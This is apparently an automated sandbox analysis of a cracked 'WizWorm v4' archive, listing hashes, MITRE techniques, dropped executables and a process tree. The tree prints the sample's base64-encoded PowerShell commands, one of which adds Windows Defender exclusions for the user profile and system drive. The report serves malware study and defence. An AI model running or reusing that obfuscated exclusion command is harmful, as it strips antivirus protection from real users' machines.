f7478694042c486cf12523f93755a432188baf0e0625d0442b03307f05908456

Analysis

max time kernel
313s
max time network
313s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22-11-2024 16:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WizWorm v4 Updated -Cracked.zip
Size

38.4MB
MD5

f21dee21d078b19e5b25239aad3576ae
SHA1

996ce235c35df69c17c617e6ad313fb808f9d47d
SHA256

f7478694042c486cf12523f93755a432188baf0e0625d0442b03307f05908456
SHA512

dd998c4526d0b97cb10a53161ce90f9a0c65f15e5971162d4b2717c88b9f8768c70b6373460dd2b44a7a5250951888562c54021d4350dfe38c97990b0a0460ee
SSDEEP

786432:1gbHG3bN5OEOLtOLTXVrHCYhKJB3qSD/lUntnPed+Gwfdp12zH+cyNS:1gbHG37ZOLtOLLVrQJdDGwd+XL1KcS

Score

7^/10

defense_evasion

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	WizWorm v4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	WizWorm v4.exe

Executes dropped EXE 12 IoCs

pid	Process
2084	WizWorm v4.exe
4472	WizWorm.exe
4408	WizWorm v4 Cracked - by llcooljake.exe
5032	WizWorm v4.exe
2680	WizWorm.exe
3404	WizWorm v4 Cracked - by llcooljake.exe
996	WizWorm.exe
1716	WizWorm v4 Cracked - by llcooljake.exe
3220	WizWorm.exe
4040	WizWorm v4 Cracked - by llcooljake.exe
2248	WizWorm.exe
396	WizWorm v4 Cracked - by llcooljake.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 36 IoCs

description	ioc	Process
File created	C:\Windows\system32\perfc010.dat	lodctr.exe
File created	C:\Windows\system32\perfh007.dat	lodctr.exe
File created	C:\Windows\system32\perfc010.dat	lodctr.exe
File created	C:\Windows\system32\perfc011.dat	lodctr.exe
File created	C:\Windows\system32\perfc009.dat	lodctr.exe
File created	C:\Windows\system32\perfc007.dat	lodctr.exe
File created	C:\Windows\system32\perfh009.dat	lodctr.exe
File created	C:\Windows\system32\perfc00A.dat	lodctr.exe
File created	C:\Windows\system32\perfh007.dat	lodctr.exe
File created	C:\Windows\system32\perfh010.dat	lodctr.exe
File created	C:\Windows\system32\perfh00C.dat	lodctr.exe
File created	C:\Windows\system32\perfh010.dat	lodctr.exe
File created	C:\Windows\system32\perfh011.dat	lodctr.exe
File created	C:\Windows\system32\perfc00C.dat	lodctr.exe
File created	C:\Windows\system32\perfc00A.dat	lodctr.exe
File created	C:\Windows\system32\perfh00C.dat	lodctr.exe
File created	C:\Windows\system32\perfc00A.dat	lodctr.exe
File created	C:\Windows\system32\perfc00C.dat	lodctr.exe
File created	C:\Windows\system32\perfh007.dat	lodctr.exe
File created	C:\Windows\system32\perfc010.dat	lodctr.exe
File created	C:\Windows\system32\perfc007.dat	lodctr.exe
File created	C:\Windows\system32\perfh00A.dat	lodctr.exe
File created	C:\Windows\system32\perfc011.dat	lodctr.exe
File created	C:\Windows\system32\perfh011.dat	lodctr.exe
File created	C:\Windows\system32\perfh009.dat	lodctr.exe
File created	C:\Windows\system32\perfh010.dat	lodctr.exe
File created	C:\Windows\system32\perfh009.dat	lodctr.exe
File created	C:\Windows\system32\perfh00C.dat	lodctr.exe
File created	C:\Windows\system32\perfh011.dat	lodctr.exe
File created	C:\Windows\system32\perfc009.dat	lodctr.exe
File created	C:\Windows\system32\perfc009.dat	lodctr.exe
File created	C:\Windows\system32\perfc00C.dat	lodctr.exe
File created	C:\Windows\system32\perfc007.dat	lodctr.exe
File created	C:\Windows\system32\perfc011.dat	lodctr.exe
File created	C:\Windows\system32\perfh00A.dat	lodctr.exe
File created	C:\Windows\system32\perfh00A.dat	lodctr.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WizWorm v4 Cracked - by llcooljake.exe	WizWorm v4.exe
File opened for modification	C:\Windows\WizWorm.exe	WizWorm v4.exe
File opened for modification	C:\Windows\WizWorm v4 Cracked - by llcooljake.exe	WizWorm v4.exe
File opened for modification	C:\Windows\WizWorm.exe	WizWorm v4.exe
File opened for modification	C:\Windows\WizWorm.exe	WizWorm v4.exe
File opened for modification	C:\Windows\WizWorm v4 Cracked - by llcooljake.exe	WizWorm v4.exe
File opened for modification	C:\Windows\WizWorm.exe	WizWorm v4.exe
File opened for modification	C:\Windows\WizWorm v4 Cracked - by llcooljake.exe	WizWorm v4.exe
File created	C:\Windows\WizWorm.exe	WizWorm v4.exe
File created	C:\Windows\WizWorm v4 Cracked - by llcooljake.exe	WizWorm v4.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
4796	powershell.exe
3528	powershell.exe
4796	powershell.exe
3528	powershell.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3844	powershell.exe
3580	7zFM.exe
3580	7zFM.exe
2248	powershell.exe
3580	7zFM.exe
3580	7zFM.exe
3844	powershell.exe
2248	powershell.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
1976	powershell.exe
3856	powershell.exe
1976	powershell.exe
3856	powershell.exe
1960	powershell.exe
2236	powershell.exe
1960	powershell.exe
2236	powershell.exe
532	powershell.exe
4432	powershell.exe
4432	powershell.exe
532	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3580	7zFM.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeRestorePrivilege	3580	7zFM.exe
Token: 35	3580	7zFM.exe
Token: SeSecurityPrivilege	3580	7zFM.exe
Token: SeDebugPrivilege	4796	powershell.exe
Token: SeDebugPrivilege	3528	powershell.exe
Token: SeSecurityPrivilege	3580	7zFM.exe
Token: SeDebugPrivilege	3844	powershell.exe
Token: SeDebugPrivilege	2248	powershell.exe
Token: SeSecurityPrivilege	3580	7zFM.exe
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeDebugPrivilege	3856	powershell.exe
Token: SeDebugPrivilege	1960	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	532	powershell.exe
Token: SeDebugPrivilege	4432	powershell.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe
3580	7zFM.exe

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 3580 wrote to memory of 2084	3580	7zFM.exe	89
PID 3580 wrote to memory of 2084	3580	7zFM.exe	89
PID 2084 wrote to memory of 4796	2084	WizWorm v4.exe	91
PID 2084 wrote to memory of 4796	2084	WizWorm v4.exe	91
PID 2084 wrote to memory of 3528	2084	WizWorm v4.exe	93
PID 2084 wrote to memory of 3528	2084	WizWorm v4.exe	93
PID 2084 wrote to memory of 4472	2084	WizWorm v4.exe	95
PID 2084 wrote to memory of 4472	2084	WizWorm v4.exe	95
PID 2084 wrote to memory of 4408	2084	WizWorm v4.exe	96
PID 2084 wrote to memory of 4408	2084	WizWorm v4.exe	96
PID 3580 wrote to memory of 5032	3580	7zFM.exe	100
PID 3580 wrote to memory of 5032	3580	7zFM.exe	100
PID 5032 wrote to memory of 3844	5032	WizWorm v4.exe	102
PID 5032 wrote to memory of 3844	5032	WizWorm v4.exe	102
PID 5032 wrote to memory of 2248	5032	WizWorm v4.exe	104
PID 5032 wrote to memory of 2248	5032	WizWorm v4.exe	104
PID 5032 wrote to memory of 2680	5032	WizWorm v4.exe	106
PID 5032 wrote to memory of 2680	5032	WizWorm v4.exe	106
PID 5032 wrote to memory of 3404	5032	WizWorm v4.exe	107
PID 5032 wrote to memory of 3404	5032	WizWorm v4.exe	107
PID 3580 wrote to memory of 4400	3580	7zFM.exe	111
PID 3580 wrote to memory of 4400	3580	7zFM.exe	111
PID 4400 wrote to memory of 1520	4400	cmd.exe	113
PID 4400 wrote to memory of 1520	4400	cmd.exe	113
PID 4700 wrote to memory of 1976	4700	WizWorm v4.exe	118
PID 4700 wrote to memory of 1976	4700	WizWorm v4.exe	118
PID 4700 wrote to memory of 3856	4700	WizWorm v4.exe	120
PID 4700 wrote to memory of 3856	4700	WizWorm v4.exe	120
PID 4700 wrote to memory of 996	4700	WizWorm v4.exe	122
PID 4700 wrote to memory of 996	4700	WizWorm v4.exe	122
PID 4700 wrote to memory of 1716	4700	WizWorm v4.exe	123
PID 4700 wrote to memory of 1716	4700	WizWorm v4.exe	123
PID 3068 wrote to memory of 2844	3068	cmd.exe	129
PID 3068 wrote to memory of 2844	3068	cmd.exe	129
PID 4124 wrote to memory of 1960	4124	WizWorm v4.exe	131
PID 4124 wrote to memory of 1960	4124	WizWorm v4.exe	131
PID 4124 wrote to memory of 2236	4124	WizWorm v4.exe	133
PID 4124 wrote to memory of 2236	4124	WizWorm v4.exe	133
PID 4124 wrote to memory of 3220	4124	WizWorm v4.exe	135
PID 4124 wrote to memory of 3220	4124	WizWorm v4.exe	135
PID 4124 wrote to memory of 4040	4124	WizWorm v4.exe	136
PID 4124 wrote to memory of 4040	4124	WizWorm v4.exe	136
PID 3132 wrote to memory of 4744	3132	cmd.exe	141
PID 3132 wrote to memory of 4744	3132	cmd.exe	141
PID 672 wrote to memory of 532	672	WizWorm v4.exe	143
PID 672 wrote to memory of 532	672	WizWorm v4.exe	143
PID 672 wrote to memory of 4432	672	WizWorm v4.exe	145
PID 672 wrote to memory of 4432	672	WizWorm v4.exe	145
PID 672 wrote to memory of 2248	672	WizWorm v4.exe	147
PID 672 wrote to memory of 2248	672	WizWorm v4.exe	147
PID 672 wrote to memory of 396	672	WizWorm v4.exe	148
PID 672 wrote to memory of 396	672	WizWorm v4.exe	148

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\WizWorm v4 Updated -Cracked.zip"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3580
- C:\Users\Admin\AppData\Local\Temp\7zOCFDFF51E\WizWorm v4.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOCFDFF51E\WizWorm v4.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:2084
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAegB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGcAdwBkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAQwByAGEAYwBrAGUAZAAgAGIAeQAgAGwAbABjAG8AbwBsAGoAYQBrAGUAIABYAGQAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAG4AZwB6ACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZwBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAbgB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAYwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAegB0ACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3528
- - C:\Windows\WizWorm.exe
    "C:\Windows\WizWorm.exe"
    3⤵
    - Executes dropped EXE
    PID:4472
- - C:\Windows\WizWorm v4 Cracked - by llcooljake.exe
    "C:\Windows\WizWorm v4 Cracked - by llcooljake.exe"
    3⤵
    - Executes dropped EXE
    PID:4408
- C:\Users\Admin\AppData\Local\Temp\7zOCFD395DE\WizWorm v4.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOCFD395DE\WizWorm v4.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:5032
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAegB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGcAdwBkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAQwByAGEAYwBrAGUAZAAgAGIAeQAgAGwAbABjAG8AbwBsAGoAYQBrAGUAIABYAGQAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAG4AZwB6ACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3844
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZwBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAbgB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAYwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAegB0ACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2248
- - C:\Windows\WizWorm.exe
    "C:\Windows\WizWorm.exe"
    3⤵
    - Executes dropped EXE
    PID:2680
- - C:\Windows\WizWorm v4 Cracked - by llcooljake.exe
    "C:\Windows\WizWorm v4 Cracked - by llcooljake.exe"
    3⤵
    - Executes dropped EXE
    PID:3404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zOCFDBE6FE\Fixer.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4400
- - C:\Windows\system32\lodctr.exe
    lodctr /r
    3⤵
    - Drops file in System32 directory
    PID:1520

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1484

C:\Users\Admin\Downloads\WizWorm v4 Updated -Cracked\WizWorm v4 Updated\WizWorm v4.exe
"C:\Users\Admin\Downloads\WizWorm v4 Updated -Cracked\WizWorm v4 Updated\WizWorm v4.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAegB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGcAdwBkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAQwByAGEAYwBrAGUAZAAgAGIAeQAgAGwAbABjAG8AbwBsAGoAYQBrAGUAIABYAGQAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAG4AZwB6ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZwBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAbgB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAYwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAegB0ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3856
- C:\Windows\WizWorm.exe
  "C:\Windows\WizWorm.exe"
  2⤵
  - Executes dropped EXE
  PID:996
- C:\Windows\WizWorm v4 Cracked - by llcooljake.exe
  "C:\Windows\WizWorm v4 Cracked - by llcooljake.exe"
  2⤵
  - Executes dropped EXE
  PID:1716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\WizWorm v4 Updated -Cracked\WizWorm v4 Updated\Fixer.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3068
- C:\Windows\system32\lodctr.exe
  lodctr /r
  2⤵
  - Drops file in System32 directory
  PID:2844

C:\Users\Admin\Downloads\WizWorm v4 Updated -Cracked\WizWorm v4 Updated\WizWorm v4.exe
"C:\Users\Admin\Downloads\WizWorm v4 Updated -Cracked\WizWorm v4 Updated\WizWorm v4.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4124
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAegB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGcAdwBkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAQwByAGEAYwBrAGUAZAAgAGIAeQAgAGwAbABjAG8AbwBsAGoAYQBrAGUAIABYAGQAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAG4AZwB6ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZwBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAbgB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAYwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAegB0ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2236
- C:\Windows\WizWorm.exe
  "C:\Windows\WizWorm.exe"
  2⤵
  - Executes dropped EXE
  PID:3220
- C:\Windows\WizWorm v4 Cracked - by llcooljake.exe
  "C:\Windows\WizWorm v4 Cracked - by llcooljake.exe"
  2⤵
  - Executes dropped EXE
  PID:4040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\WizWorm v4 Updated -Cracked\WizWorm v4 Updated\Fixer.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3132
- C:\Windows\system32\lodctr.exe
  lodctr /r
  2⤵
  - Drops file in System32 directory
  PID:4744

C:\Users\Admin\Downloads\WizWorm v4 Updated -Cracked\WizWorm v4 Updated\WizWorm v4.exe
"C:\Users\Admin\Downloads\WizWorm v4 Updated -Cracked\WizWorm v4 Updated\WizWorm v4.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAegB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGcAdwBkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAQwByAGEAYwBrAGUAZAAgAGIAeQAgAGwAbABjAG8AbwBsAGoAYQBrAGUAIABYAGQAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAG4AZwB6ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZwBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAbgB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAYwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAegB0ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4432
- C:\Windows\WizWorm.exe
  "C:\Windows\WizWorm.exe"
  2⤵
  - Executes dropped EXE
  PID:2248
- C:\Windows\WizWorm v4 Cracked - by llcooljake.exe
  "C:\Windows\WizWorm v4 Cracked - by llcooljake.exe"
  2⤵
  - Executes dropped EXE
  PID:396

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WizWorm v4 Cracked - by llcooljake.exe.log

Filesize
871B

MD5
386677f585908a33791517dfc2317f88

SHA1
2e6853b4560a9ac8a74cdd5c3124a777bc0d874e

SHA256
7caf8779608c167ab6fa570df00c973aff6dee850bb63439770889a68c7cdae0

SHA512
876d2269e25a4b2754bdf2c7e3c410050f885d7e6bd8abce41c5fc74ae1f8c549b2266dd1588c750f614063f36c8a8e5008cea610505897d04e4ef5c3adc52d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WizWorm v4.exe.log

Filesize
425B

MD5
fff5cbccb6b31b40f834b8f4778a779a

SHA1
899ed0377e89f1ed434cfeecc5bc0163ebdf0454

SHA256
b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76

SHA512
1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
37c67e26b8e2a0b5f5ced6423bc31d31

SHA1
0f206064388c22eae16c30caa6b1fc6ec00a4ca5

SHA256
af9dc5813a2250a6710362b8b14b25f4e20d284e8a40d3e0b5ae40ef423ea6e2

SHA512
3798710a14a1105e486b1f1d17311744efa4b0c39a9bab46cd317bee3fcd633d5a7f224e24380d294e5d86f4b5c7f33e89b47e3ecf6a9572d234d0b960871963

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
41448f45815883497ed545ee6ebd200c

SHA1
aa0d5cda759f300ab284ea6a3b95beca80b3d28a

SHA256
f81eac518556cc08856e28e58ac5cdc36dd2e83f6673b2603b0f96e093036d44

SHA512
1aa64ab0dd2b6d961416888cd4fb609d0fa26547e30c983c6cd9aa7b97f1882570cf8ab2e7202b0bc4a8bf7f8524115b4c26e38d37ac83fd74c821cc0b075f76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9cf8f6bd96c9973608e83e63574c9a30

SHA1
2a050cb4a7d4bba13465fa806018f006a25d0e30

SHA256
764d6409b6fd6559795ae09f50e2c930ebab1ad9785b83ae2ba1207ca0acac8f

SHA512
ea67322d027fa4ea159b2e209ca661a68472763d7c49049897910ff924221458e2057fb207325dbe22f2050f12261074541b39c9e4fa4e5242c1399dde60491e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a2745952095b7f6bdcc42de483e44112

SHA1
2902b7ccd1afb6ffad1894ed3e1af6afde2c05c3

SHA256
cdb06c0dbc8b08af0ed2f971b35fbb978328b37cf27d1dd0e3744ee3105204d8

SHA512
632e758ce9cee6cee2768d02c056ac4819e5295595a50b2710c5e97ec7751a788e9755d66f3d1baac2c7cb44ef0de91beabd0289bd38449ddc49eec8899c0ccb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e1d7973fb9071815b4241da5ec0dfb6a

SHA1
41f06afbd0ac9f9a0b226a2dd6fa9495d83209b9

SHA256
b3953ac9f5752d996ec2545864d6ccf09ffe4b0f84f41a2cc52a95ad8103212b

SHA512
66163114aba8867561ceac2124bc2060c351cb4a83c4f8d40bc6bfd8042881690ea8152e2b58ec55b4b6de17e1610642c90df602e1fb2658b4c3d0783f3a0900

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zOCFDBE6FE\Fixer.bat

Filesize
126B

MD5
3e41f6c12444d0c72b8c2d9be75f2efd

SHA1
64e6cd77417d3e355c36ee1d15677723c96b6695

SHA256
b13589d839dded18a4b7258c6418dbee5759665f4eb18878ce2a76bca31b7753

SHA512
b8b0975a58a2aa161b691f44d6e0e0dd99f76381e2f94f49cda1eec4b5ca6a68200b9534d0f73cdc332b9f243d051c41038231852c969b77f418b5711c9e4f99

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zOCFDFF51E\WizWorm v4.exe

Filesize
14.9MB

MD5
